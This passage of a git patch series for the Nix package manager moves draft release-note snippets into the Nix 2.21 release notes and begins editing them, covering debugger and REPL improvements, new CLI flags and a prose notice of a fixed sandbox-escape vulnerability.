 delete mode 100644 doc/manual/rl-next/reduce-debugger-clutter.md
 delete mode 100644 doc/manual/rl-next/repl-ctrl-c-while-printing.md
 delete mode 100644 doc/manual/rl-next/repl-cycle-detection.md
 delete mode 100644 doc/manual/rl-next/source-location-in-while-evaluating-attribute.md
 delete mode 100644 doc/manual/rl-next/stack-size-macos.md
 create mode 100644 doc/manual/src/release-notes/rl-2.21.md

diff --git a/doc/manual/rl-next/arg-from-file.md b/doc/manual/rl-next/arg-from-file.md
deleted file mode 100644
index 5849b11a3..000000000
--- a/doc/manual/rl-next/arg-from-file.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-synopsis: "CLI options `--arg-from-file` and `--arg-from-stdin`"
-prs: 10122
----
-
-The new CLI option `--arg-from-file` *name* *path* passes the contents
-of file *path* as a string value via the function argument *name* to a
-Nix expression. Similarly, the new option `--arg-from-stdin` *name*
-reads the contents of the string from standard input.
diff --git a/doc/manual/rl-next/better-errors-in-nix-repl.md b/doc/manual/rl-next/better-errors-in-nix-repl.md
deleted file mode 100644
index 4deaa8c70..000000000
--- a/doc/manual/rl-next/better-errors-in-nix-repl.md
+++ /dev/null
@@ -1,40 +0,0 @@
----
-synopsis: Concise error printing in `nix repl`
-prs: 9928
----
-
-Previously, if an element of a list or attribute set threw an error while
-evaluating, `nix repl` would print the entire error (including source location
-information) inline. This output was clumsy and difficult to parse:
-
-```
-nix-repl> { err = builtins.throw "uh oh!"; }
-{ err = «error:
-       … while calling the 'throw' builtin
-         at «string»:1:9:
-            1| { err = builtins.throw "uh oh!"; }
-             |         ^
-
-       error: uh oh!»; }
-```
-
-Now, only the error message is displayed, making the output much more readable.
-```
-nix-repl> { err = builtins.throw "uh oh!"; }
-{ err = «error: uh oh!»; }
-```
-
-However, if the whole expression being evaluated throws an error, source
-locations and (if applicable) a stack trace are printed, just like you'd expect:
-
-```
-nix-repl> builtins.throw "uh oh!"
-error:
-       … while calling the 'throw' builtin
-         at «string»:1:1:
-            1| builtins.throw "uh oh!"
-             | ^
-
-       error: uh oh!
-```
-
diff --git a/doc/manual/rl-next/debugger-locals-for-let-expressions.md b/doc/manual/rl-next/debugger-locals-for-let-expressions.md
deleted file mode 100644
index 736208724..000000000
--- a/doc/manual/rl-next/debugger-locals-for-let-expressions.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-synopsis: "`--debugger` can now access bindings from `let` expressions"
-prs: 9918
-issues: 8827.
----
-
-Breakpoints and errors in the bindings of a `let` expression can now access
-those bindings in the debugger. Previously, only the body of `let` expressions
-could access those bindings.
diff --git a/doc/manual/rl-next/debugger-on-trace.md b/doc/manual/rl-next/debugger-on-trace.md
deleted file mode 100644
index 721928550..000000000
--- a/doc/manual/rl-next/debugger-on-trace.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-synopsis: Enter the `--debugger` when `builtins.trace` is called if `debugger-on-trace` is set
-prs: 9914
----
-
-If the `debugger-on-trace` option is set and `--debugger` is given,
-`builtins.trace` calls will behave similarly to `builtins.break` and will enter
-the debug REPL. This is useful for determining where warnings are being emitted
-from.
diff --git a/doc/manual/rl-next/debugger-positions.md b/doc/manual/rl-next/debugger-positions.md
deleted file mode 100644
index 2fe868413..000000000
--- a/doc/manual/rl-next/debugger-positions.md
+++ /dev/null
@@ -1,25 +0,0 @@
----
-synopsis: Debugger prints source position information
-prs: 9913
----
-
-The `--debugger` now prints source location information, instead of the
-pointers of source location information. Before:
-
-```
-nix-repl> :bt
-0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
-0x600001522598
-```
-
-After:
-
-```
-0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
-/nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
-
-   131|
-   132|       bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
-      |                           ^
-   133|     in
-```
diff --git a/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md b/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md
deleted file mode 100644
index c93225816..000000000
--- a/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md
+++ /dev/null
@@ -1,25 +0,0 @@
----
-synopsis: The `--debugger` will start more reliably in `let` expressions and function calls
-prs: 9917
-issues: 6649
----
-
-Previously, if you attempted to evaluate this file with the debugger:
-
-```nix
-let
-  a = builtins.trace "before inner break" (
-    builtins.break "hello"
-  );
-  b = builtins.trace "before outer break" (
-    builtins.break a
-  );
-in
-  b
-```
-
-Nix would correctly enter the debugger at `builtins.break a`, but if you asked
-it to `:continue`, it would skip over the `builtins.break "hello"` expression
-entirely.
-
-Now, Nix will correctly enter the debugger at both breakpoints.
diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
deleted file mode 100644
index ed451711e..000000000
--- a/doc/manual/rl-next/fod-sandbox-escape.md
+++ /dev/null
@@ -1,14 +0,0 @@
----
-synopsis: Fix a FOD sandbox escape
-issues:
-prs:
----
-
-Cooperating Nix derivations could send file descriptors to files in the Nix
-store to each other via Unix domain sockets in the abstract namespace. This
-allowed one derivation to modify the output of the other derivation, after Nix
-has registered the path as "valid" and immutable in the Nix database.
-In particular, this allowed the output of fixed-output derivations to be
-modified from their expected content.
-
-This isn't the case any more.
diff --git a/doc/manual/rl-next/forbid-nested-debuggers.md b/doc/manual/rl-next/forbid-nested-debuggers.md
deleted file mode 100644
index a5924b24f..000000000
--- a/doc/manual/rl-next/forbid-nested-debuggers.md
+++ /dev/null
@@ -1,32 +0,0 @@
----
-synopsis: Nested debuggers are no longer supported
-prs: 9920
----
-
-Previously, evaluating an expression that throws an error in the debugger would
-enter a second, nested debugger:
-
-```
-nix-repl> builtins.throw "what"
-error: what
-
-
-Starting REPL to allow you to inspect the current state of the evaluator.
-
-Welcome to Nix 2.18.1. Type :? for help.
-
-nix-repl>
-```
-
-Now, it just prints the error message like `nix repl`:
-
-```
-nix-repl> builtins.throw "what"
-error:
-       … while calling the 'throw' builtin
-         at «string»:1:1:
-            1| builtins.throw "what"
-             | ^
-
-       error: what
-```
diff --git a/doc/manual/rl-next/formal-order.md b/doc/manual/rl-next/formal-order.md
deleted file mode 100644
index 12628e318..000000000
--- a/doc/manual/rl-next/formal-order.md
+++ /dev/null
@@ -1,7 +0,0 @@
----
-synopsis: consistent order of lambda formals in printed expressions
-prs: 9874
----
-
-Always print lambda formals in lexicographic order rather than the internal, creation-time based symbol order.
-This makes printed formals independent of the context they appear in.
diff --git a/doc/manual/rl-next/inherit-error-positions.md b/doc/manual/rl-next/inherit-error-positions.md
deleted file mode 100644
index 643080e9e..000000000
--- a/doc/manual/rl-next/inherit-error-positions.md
+++ /dev/null
@@ -1,6 +0,0 @@
----
-synopsis: fix duplicate attribute error positions for `inherit`
-prs: 9874
----
-
-When an inherit caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
diff --git a/doc/manual/rl-next/inherit-from-by-need.md b/doc/manual/rl-next/inherit-from-by-need.md
deleted file mode 100644
index 67c2cdedf..000000000
--- a/doc/manual/rl-next/inherit-from-by-need.md
+++ /dev/null
@@ -1,7 +0,0 @@
----
-synopsis: "`inherit (x) ...` evaluates `x` only once"
-prs: 9847
----
-
-`inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
-This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
diff --git a/doc/manual/rl-next/lambda-printing.md b/doc/manual/rl-next/lambda-printing.md
deleted file mode 100644
index 3a63f3068..000000000
--- a/doc/manual/rl-next/lambda-printing.md
+++ /dev/null
@@ -1,50 +0,0 @@
----
-synopsis: Functions are printed with more detail
-prs: 9606
-issues: 7145
----
-
-Functions and `builtins` are printed with more detail in `nix repl`, `nix
-eval`, `builtins.trace`, and most other places values are printed.
-
-Before:
-
-```
-$ nix repl nixpkgs
-nix-repl> builtins.map
-«primop»
-
-nix-repl> builtins.map lib.id
-«primop-app»
-
-nix-repl> builtins.trace lib.id "my-value"
-trace: 
-"my-value"
-
-$ nix eval --file functions.nix
-{ id = ; primop = ; primop-app = ; }
-```
-
-After:
-
-```
-$ nix repl nixpkgs
-nix-repl> builtins.map
-«primop map»
-
-nix-repl> builtins.map lib.id
-«partially applied primop map»
-
-nix-repl> builtins.trace lib.id "my-value"
-trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5»
-"my-value"
-
-$ nix eval --file functions.nix
-{ id = «lambda id @ /Users/wiggles/nix/functions.nix:2:8»; primop = «primop map»; primop-app = «partially applied primop map»; }
-```
-
-This was actually released in Nix 2.20, but wasn't added to the release notes
-so we're announcing it here. The historical release notes have been updated as well.
-
-[type-error]: https://github.com/NixOS/nix/pull/9753
-[coercion-error]: https://github.com/NixOS/nix/pull/9754
diff --git a/doc/manual/rl-next/leading-period.md b/doc/manual/rl-next/leading-period.md
deleted file mode 100644
index ef7c2326f..000000000
--- a/doc/manual/rl-next/leading-period.md
+++ /dev/null
@@ -1,10 +0,0 @@
----
-synopsis: Store paths are allowed to start with `.`
-issues: 912
-prs: 9867 9091 9095 9120 9121 9122 9130 9219 9224
----
-
-Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
-From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
-
-Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).
diff --git a/doc/manual/rl-next/more-commands-respect-ctrl-c.md b/doc/manual/rl-next/more-commands-respect-ctrl-c.md
deleted file mode 100644
index 948930c96..000000000
--- a/doc/manual/rl-next/more-commands-respect-ctrl-c.md
+++ /dev/null
@@ -1,13 +0,0 @@
----
-synopsis: Nix commands respect Ctrl-C
-prs: 9687 6995
-issues: 7245
----
-
-Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed
-while performing various operations (including `nix develop`, `nix flake
-update`, and so on). With several fixes to Nix's signal handlers, Nix commands
-will now exit quickly after Ctrl-C is pressed.
-
-This was actually released in Nix 2.20, but wasn't added to the release notes
-so we're announcing it here. The historical release notes have been updated as well.
diff --git a/doc/manual/rl-next/pretty-print-in-nix-repl.md b/doc/manual/rl-next/pretty-print-in-nix-repl.md
deleted file mode 100644
index 26ba5162a..000000000
--- a/doc/manual/rl-next/pretty-print-in-nix-repl.md
+++ /dev/null
@@ -1,24 +0,0 @@
----
-synopsis: "`nix repl` pretty-prints values"
-prs: 9931
----
-
-`nix repl` will now pretty-print values:
-
-```
-{
-  attrs = {
-    a = {
-      b = {
-        c = { };
-      };
-    };
-  };
-  list = [ 1 ];
-  list' = [
-    1
-    2
-    3
-  ];
-}
-```
diff --git a/doc/manual/rl-next/profile-regex-all.md b/doc/manual/rl-next/profile-regex-all.md
deleted file mode 100644
index e3e6849cc..000000000
--- a/doc/manual/rl-next/profile-regex-all.md
+++ /dev/null
@@ -1,35 +0,0 @@
----
-synopsis: Introduction of `--regex` and `--all` in `nix profile remove` and `nix profile upgrade`
-prs: 10166
----
-
-Previously the command-line arguments for `nix profile remove` and `nix profile upgrade` matched the package entries using regular expression.
-For instance:
-
-```
-nix profile remove '.*vim.*'
-```
-
-This would remove all packages that contain `vim` in their name.
-
-In most cases, only singular package names were used to remove and upgrade packages. Mixing this with regular expressions sometimes lead to unintended behavior. For instance, `python3.1` could match `python311`.
-
-To avoid unintended behavior, the arguments are now only matching exact names.
-
-Matching using regular expressions is still possible by using the new `--regex` flag:
-
-```
-nix profile remove --regex '.*vim.*'
-```
-
-One of the most useful cases for using regular expressions was to upgrade all packages. This was previously accomplished by:
-
-```
-nix profile upgrade '.*'
-```
-
-With the introduction of the `--all` flag, this now becomes more straightforward:
-
-```
-nix profile upgrade --all
-```
diff --git a/doc/manual/rl-next/reduce-debugger-clutter.md b/doc/manual/rl-next/reduce-debugger-clutter.md
deleted file mode 100644
index 9bc902eee..000000000
--- a/doc/manual/rl-next/reduce-debugger-clutter.md
+++ /dev/null
@@ -1,37 +0,0 @@
----
-synopsis: "Visual clutter in `--debugger` is reduced"
-prs: 9919
----
-
-Before:
-```
-info: breakpoint reached
-
-
-Starting REPL to allow you to inspect the current state of the evaluator.
-
-Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
-
-nix-repl> :continue
-error: uh oh
-
-
-Starting REPL to allow you to inspect the current state of the evaluator.
-
-Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
-
-nix-repl>
-```
-
-After:
-
-```
-info: breakpoint reached
-
-Nix 2.20.0pre20231222_dirty debugger
-Type :? for help.
-nix-repl> :continue
-error: uh oh
-
-nix-repl>
-```
diff --git a/doc/manual/rl-next/repl-ctrl-c-while-printing.md b/doc/manual/rl-next/repl-ctrl-c-while-printing.md
deleted file mode 100644
index 15b0daa0a..000000000
--- a/doc/manual/rl-next/repl-ctrl-c-while-printing.md
+++ /dev/null
@@ -1,8 +0,0 @@
----
-synopsis: "`nix repl` now respects Ctrl-C while printing values"
-prs: 9927
----
-
-`nix repl` will now halt immediately when Ctrl-C is pressed while it's printing
-a value. This is useful if you got curious about what would happen if you
-printed all of Nixpkgs.
diff --git a/doc/manual/rl-next/repl-cycle-detection.md b/doc/manual/rl-next/repl-cycle-detection.md
deleted file mode 100644
index de24c4be1..000000000
--- a/doc/manual/rl-next/repl-cycle-detection.md
+++ /dev/null
@@ -1,22 +0,0 @@
----
-synopsis: Cycle detection in `nix repl` is simpler and more reliable
-prs: 9926
-issues: 8672
----
-
-The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere
-else values are printed is now simpler and matches the cycle detection in
-`nix-instantiate --eval` output.
-
-Before:
-
-```
-nix eval --expr 'let self = { inherit self; }; in self'
-{ self = { self = «repeated»; }; }
-```
-
-After:
-
-```
-{ self = «repeated»; }
-```
diff --git a/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md b/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md
deleted file mode 100644
index 0e0b74c5a..000000000
--- a/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md
+++ /dev/null
@@ -1,23 +0,0 @@
----
-synopsis: "In the debugger, `while evaluating the attribute` errors now include position information"
-prs: 9915
----
-
-Before:
-
-```
-0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
-0x600001522598
-```
-
-After:
-
-```
-0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
-/nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
-
-   131|
-   132|       bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
-      |                           ^
-   133|     in
-```
diff --git a/doc/manual/rl-next/stack-size-macos.md b/doc/manual/rl-next/stack-size-macos.md
deleted file mode 100644
index b1c40bb5a..000000000
--- a/doc/manual/rl-next/stack-size-macos.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-synopsis: Stack size is increased on macOS
-prs: 9860
----
-
-Previously, Nix would set the stack size to 64MiB on Linux, but would leave the
-stack size set to the default (approximately 8KiB) on macOS. Now, the stack
-size is correctly set to 64MiB on macOS as well, which should reduce stack
-overflow segfaults in deeply-recursive Nix expressions.
diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in
index 70dea4fbd..1149fc7b4 100644
--- a/doc/manual/src/SUMMARY.md.in
+++ b/doc/manual/src/SUMMARY.md.in
@@ -121,6 +121,7 @@
   - [C++ style guide](contributing/cxx.md)
 - [Release Notes](release-notes/index.md)
 {{#include ./SUMMARY-rl-next.md}}
+  - [Release 2.21 (2024-03-11)](release-notes/rl-2.21.md)
   - [Release 2.20 (2024-01-29)](release-notes/rl-2.20.md)
   - [Release 2.19 (2023-11-17)](release-notes/rl-2.19.md)
   - [Release 2.18 (2023-09-20)](release-notes/rl-2.18.md)
diff --git a/doc/manual/src/release-notes/rl-2.21.md b/doc/manual/src/release-notes/rl-2.21.md
new file mode 100644
index 000000000..707b56ce1
--- /dev/null
+++ b/doc/manual/src/release-notes/rl-2.21.md
@@ -0,0 +1,366 @@
+# Release 2.21.0 (2024-03-11)
+
+- CLI options `--arg-from-file` and `--arg-from-stdin` [#10122](https://github.com/NixOS/nix/pull/10122)
+
+  The new CLI option `--arg-from-file` *name* *path* passes the contents
+  of file *path* as a string value via the function argument *name* to a
+  Nix expression. Similarly, the new option `--arg-from-stdin` *name*
+  reads the contents of the string from standard input.
+
+- Concise error printing in `nix repl` [#9928](https://github.com/NixOS/nix/pull/9928)
+
+  Previously, if an element of a list or attribute set threw an error while
+  evaluating, `nix repl` would print the entire error (including source location
+  information) inline. This output was clumsy and difficult to parse:
+
+  ```
+  nix-repl> { err = builtins.throw "uh oh!"; }
+  { err = «error:
+         … while calling the 'throw' builtin
+           at «string»:1:9:
+              1| { err = builtins.throw "uh oh!"; }
+               |         ^
+
+         error: uh oh!»; }
+  ```
+
+  Now, only the error message is displayed, making the output much more readable.
+  ```
+  nix-repl> { err = builtins.throw "uh oh!"; }
+  { err = «error: uh oh!»; }
+  ```
+
+  However, if the whole expression being evaluated throws an error, source
+  locations and (if applicable) a stack trace are printed, just like you'd expect:
+
+  ```
+  nix-repl> builtins.throw "uh oh!"
+  error:
+         … while calling the 'throw' builtin
+           at «string»:1:1:
+              1| builtins.throw "uh oh!"
+               | ^
+
+         error: uh oh!
+  ```
+
+- `--debugger` can now access bindings from `let` expressions [#8827](https://github.com/NixOS/nix/issues/8827) [#9918](https://github.com/NixOS/nix/pull/9918)
+
+  Breakpoints and errors in the bindings of a `let` expression can now access
+  those bindings in the debugger. Previously, only the body of `let` expressions
+  could access those bindings.
+
+- Enter the `--debugger` when `builtins.trace` is called if `debugger-on-trace` is set [#9914](https://github.com/NixOS/nix/pull/9914)
+
+  If the `debugger-on-trace` option is set and `--debugger` is given,
+  `builtins.trace` calls will behave similarly to `builtins.break` and will enter
+  the debug REPL. This is useful for determining where warnings are being emitted
+  from.
+
+- Debugger prints source position information [#9913](https://github.com/NixOS/nix/pull/9913)
+
+  The `--debugger` now prints source location information, instead of the
+  pointers of source location information. Before:
+
+  ```
+  nix-repl> :bt
+  0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+  0x600001522598
+  ```
+
+  After:
+
+  ```
+  0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+  /nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
+
+     131|
+     132|       bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
+        |                           ^
+     133|     in
+  ```
+
+- The `--debugger` will start more reliably in `let` expressions and function calls [#6649](https://github.com/NixOS/nix/issues/6649) [#9917](https://github.com/NixOS/nix/pull/9917)
+
+  Previously, if you attempted to evaluate this file with the debugger:
+
+  ```nix
+  let
+    a = builtins.trace "before inner break" (
+      builtins.break "hello"
+    );
+    b = builtins.trace "before outer break" (
+      builtins.break a
+    );
+  in
+    b
+  ```
+
+  Nix would correctly enter the debugger at `builtins.break a`, but if you asked
+  it to `:continue`, it would skip over the `builtins.break "hello"` expression
+  entirely.
+
+  Now, Nix will correctly enter the debugger at both breakpoints.
+
+- Fix a FOD sandbox escape
+
+  Cooperating Nix derivations could send file descriptors to files in the Nix
+  store to each other via Unix domain sockets in the abstract namespace. This
+  allowed one derivation to modify the output of the other derivation, after Nix
+  has registered the path as "valid" and immutable in the Nix database.
+  In particular, this allowed the output of fixed-output derivations to be
+  modified from their expected content.
+
+  This isn't the case any more.
+
+- Nested debuggers are no longer supported [#9920](https://github.com/NixOS/nix/pull/9920)
+
+  Previously, evaluating an expression that throws an error in the debugger would
+  enter a second, nested debugger:
+
+  ```
+  nix-repl> builtins.throw "what"
+  error: what
+
+
+  Starting REPL to allow you to inspect the current state of the evaluator.
+
+  Welcome to Nix 2.18.1. Type :? for help.
+
+  nix-repl>
+  ```
+
+  Now, it just prints the error message like `nix repl`:
+
+  ```
+  nix-repl> builtins.throw "what"
+  error:
+         … while calling the 'throw' builtin
+           at «string»:1:1:
+              1| builtins.throw "what"
+               | ^
+
+         error: what
+  ```
+
+- consistent order of lambda formals in printed expressions [#9874](https://github.com/NixOS/nix/pull/9874)
+
+  Always print lambda formals in lexicographic order rather than the internal, creation-time based symbol order.
+  This makes printed formals independent of the context they appear in.
+
+- fix duplicate attribute error positions for `inherit` [#9874](https://github.com/NixOS/nix/pull/9874)
+
+  When an inherit caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
+
+- `inherit (x) ...` evaluates `x` only once [#9847](https://github.com/NixOS/nix/pull/9847)
+
+  `inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
+  This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
+
+- Functions are printed with more detail [#7145](https://github.com/NixOS/nix/issues/7145) [#9606](https://github.com/NixOS/nix/pull/9606)
+
+  Functions and `builtins` are printed with more detail in `nix repl`, `nix
+  eval`, `builtins.trace`, and most other places values are printed.
+
+  Before:
+
+  ```
+  $ nix repl nixpkgs
+  nix-repl> builtins.map
+  «primop»
+
+  nix-repl> builtins.map lib.id
+  «primop-app»
+
+  nix-repl> builtins.trace lib.id "my-value"
+  trace: 
+  "my-value"
+
+  $ nix eval --file functions.nix
+  { id = ; primop = ; primop-app = ; }
+  ```
+
+  After:
+
+  ```
+  $ nix repl nixpkgs
+  nix-repl> builtins.map
+  «primop map»
+
+  nix-repl> builtins.map lib.id
+  «partially applied primop map»
+
+  nix-repl> builtins.trace lib.id "my-value"
+  trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5»
+  "my-value"
+
+  $ nix eval --file functions.nix
+  { id = «lambda id @ /Users/wiggles/nix/functions.nix:2:8»; primop = «primop map»; primop-app = «partially applied primop map»; }
+  ```
+
+  This was actually released in Nix 2.20, but wasn't added to the release notes
+  so we're announcing it here. The historical release notes have been updated as well.
+
+  [type-error]: https://github.com/NixOS/nix/pull/9753
+  [coercion-error]: https://github.com/NixOS/nix/pull/9754
+
+- Store paths are allowed to start with `.` [#912](https://github.com/NixOS/nix/issues/912) [#9091](https://github.com/NixOS/nix/pull/9091) [#9095](https://github.com/NixOS/nix/pull/9095) [#9120](https://github.com/NixOS/nix/pull/9120) [#9121](https://github.com/NixOS/nix/pull/9121) [#9122](https://github.com/NixOS/nix/pull/9122) [#9130](https://github.com/NixOS/nix/pull/9130) [#9219](https://github.com/NixOS/nix/pull/9219) [#9224](https://github.com/NixOS/nix/pull/9224) [#9867](https://github.com/NixOS/nix/pull/9867)
+
+  Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
+  From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
+
+  Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).
+
+- Nix commands respect Ctrl-C [#7245](https://github.com/NixOS/nix/issues/7245) [#6995](https://github.com/NixOS/nix/pull/6995) [#9687](https://github.com/NixOS/nix/pull/9687)
+
+  Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed
+  while performing various operations (including `nix develop`, `nix flake
+  update`, and so on). With several fixes to Nix's signal handlers, Nix commands
+  will now exit quickly after Ctrl-C is pressed.
+
+  This was actually released in Nix 2.20, but wasn't added to the release notes
+  so we're announcing it here. The historical release notes have been updated as well.
+
+- `nix repl` pretty-prints values [#9931](https://github.com/NixOS/nix/pull/9931)
+
+  `nix repl` will now pretty-print values:
+
+  ```
+  {
+    attrs = {
+      a = {
+        b = {
+          c = { };
+        };
+      };
+    };
+    list = [ 1 ];
+    list' = [
+      1
+      2
+      3
+    ];
+  }
+  ```
+
+- Introduction of `--regex` and `--all` in `nix profile remove` and `nix profile upgrade` [#10166](https://github.com/NixOS/nix/pull/10166)
+
+  Previously the command-line arguments for `nix profile remove` and `nix profile upgrade` matched the package entries using regular expressions.
+  For instance:
+
+  ```
+  nix profile remove '.*vim.*'
+  ```
+
+  This would remove all packages that contain `vim` in their name.
+
+  In most cases, only singular package names were used to remove and upgrade packages. Mixing this with regular expressions sometimes led to unintended behavior. For instance, `python3.1` could match `python311`.
+
+  To avoid unintended behavior, the arguments are now only matching exact names.
+
+  Matching using regular expressions is still possible by using the new `--regex` flag:
+
+  ```
+  nix profile remove --regex '.*vim.*'
+  ```
+
+  One of the most useful cases for using regular expressions was to upgrade all packages. This was previously accomplished by:
+
+  ```
+  nix profile upgrade '.*'
+  ```
+
+  With the introduction of the `--all` flag, this now becomes more straightforward:
+
+  ```
+  nix profile upgrade --all
+  ```
+
+- Visual clutter in `--debugger` is reduced [#9919](https://github.com/NixOS/nix/pull/9919)
+
+  Before:
+  ```
+  info: breakpoint reached
+
+
+  Starting REPL to allow you to inspect the current state of the evaluator.
+
+  Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
+
+  nix-repl> :continue
+  error: uh oh
+
+
+  Starting REPL to allow you to inspect the current state of the evaluator.
+
+  Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
+
+  nix-repl>
+  ```
+
+  After:
+
+  ```
+  info: breakpoint reached
+
+  Nix 2.20.0pre20231222_dirty debugger
+  Type :? for help.
+  nix-repl> :continue
+  error: uh oh
+
+  nix-repl>
+  ```
+
+- `nix repl` now respects Ctrl-C while printing values [#9927](https://github.com/NixOS/nix/pull/9927)
+
+  `nix repl` will now halt immediately when Ctrl-C is pressed while it's printing
+  a value. This is useful if you got curious about what would happen if you
+  printed all of Nixpkgs.
+
+- Cycle detection in `nix repl` is simpler and more reliable [#8672](https://github.com/NixOS/nix/issues/8672) [#9926](https://github.com/NixOS/nix/pull/9926)
+
+  The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere
+  else values are printed is now simpler and matches the cycle detection in
+  `nix-instantiate --eval` output.
+
+  Before:
+
+  ```
+  nix eval --expr 'let self = { inherit self; }; in self'
+  { self = { self = «repeated»; }; }
+  ```
+
+  After:
+
+  ```
+  { self = «repeated»; }
+  ```
+
+- In the debugger, `while evaluating the attribute` errors now include position information [#9915](https://github.com/NixOS/nix/pull/9915)
+
+  Before:
+
+  ```
+  0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+  0x600001522598
+  ```
+
+  After:
+
+  ```
+  0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+  /nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
+
+     131|
+     132|       bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
+        |                           ^
+     133|     in
+  ```
+
+- Stack size is increased on macOS [#9860](https://github.com/NixOS/nix/pull/9860)
+
+  Previously, Nix would set the stack size to 64MiB on Linux, but would leave the
+  stack size set to the default (approximately 8MiB) on macOS. Now, the stack
+  size is correctly set to 64MiB on macOS as well, which should reduce stack
+  overflow segfaults in deeply-recursive Nix expressions.
+

From 4c97a66b4cfd6cb645a26be88c89ca51e48839f7 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 11 Mar 2024 18:00:10 +0100
Subject: [PATCH 614/654] Tweak release notes

---
 doc/manual/src/release-notes/rl-2.21.md | 96 +++++--------------------
 1 file changed, 16 insertions(+), 80 deletions(-)

diff --git a/doc/manual/src/release-notes/rl-2.21.md b/doc/manual/src/release-notes/rl-2.21.md
index 707b56ce1..75114f117 100644
--- a/doc/manual/src/release-notes/rl-2.21.md
+++ b/doc/manual/src/release-notes/rl-2.21.md
@@ -1,5 +1,16 @@
 # Release 2.21.0 (2024-03-11)
 
+- Fix a fixed-output derivation sandbox escape (CVE-2024-27297)
+
+  Cooperating Nix derivations could send file descriptors to files in the Nix
+  store to each other via Unix domain sockets in the abstract namespace. This
+  allowed one derivation to modify the output of the other derivation, after Nix
+  has registered the path as "valid" and immutable in the Nix database.
+  In particular, this allowed the output of fixed-output derivations to be
+  modified from their expected content.
+
+  This isn't the case any more.
+
 - CLI options `--arg-from-file` and `--arg-from-stdin` [#10122](https://github.com/NixOS/nix/pull/10122)
 
   The new CLI option `--arg-from-file` *name* *path* passes the contents
@@ -102,17 +113,6 @@
 
   Now, Nix will correctly enter the debugger at both breakpoints.
 
-- Fix a FOD sandbox escape
-
-  Cooperating Nix derivations could send file descriptors to files in the Nix
-  store to each other via Unix domain sockets in the abstract namespace. This
-  allowed one derivation to modify the output of the other derivation, after Nix
-  has registered the path as "valid" and immutable in the Nix database.
-  In particular, this allowed the output of fixed-output derivations to be
-  modified from their expected content.
-
-  This isn't the case any more.
-
 - Nested debuggers are no longer supported [#9920](https://github.com/NixOS/nix/pull/9920)
 
   Previously, evaluating an expression that throws an error in the debugger would
@@ -143,84 +143,26 @@
          error: what
   ```
 
-- consistent order of lambda formals in printed expressions [#9874](https://github.com/NixOS/nix/pull/9874)
+- Consistent order of function arguments in printed expressions [#9874](https://github.com/NixOS/nix/pull/9874)
 
-  Always print lambda formals in lexicographic order rather than the internal, creation-time based symbol order.
-  This makes printed formals independent of the context they appear in.
+  Function arguments are now printed in lexicographic order rather than the internal, creation-time based symbol order.
 
-- fix duplicate attribute error positions for `inherit` [#9874](https://github.com/NixOS/nix/pull/9874)
+- Fix duplicate attribute error positions for `inherit` [#9874](https://github.com/NixOS/nix/pull/9874)
 
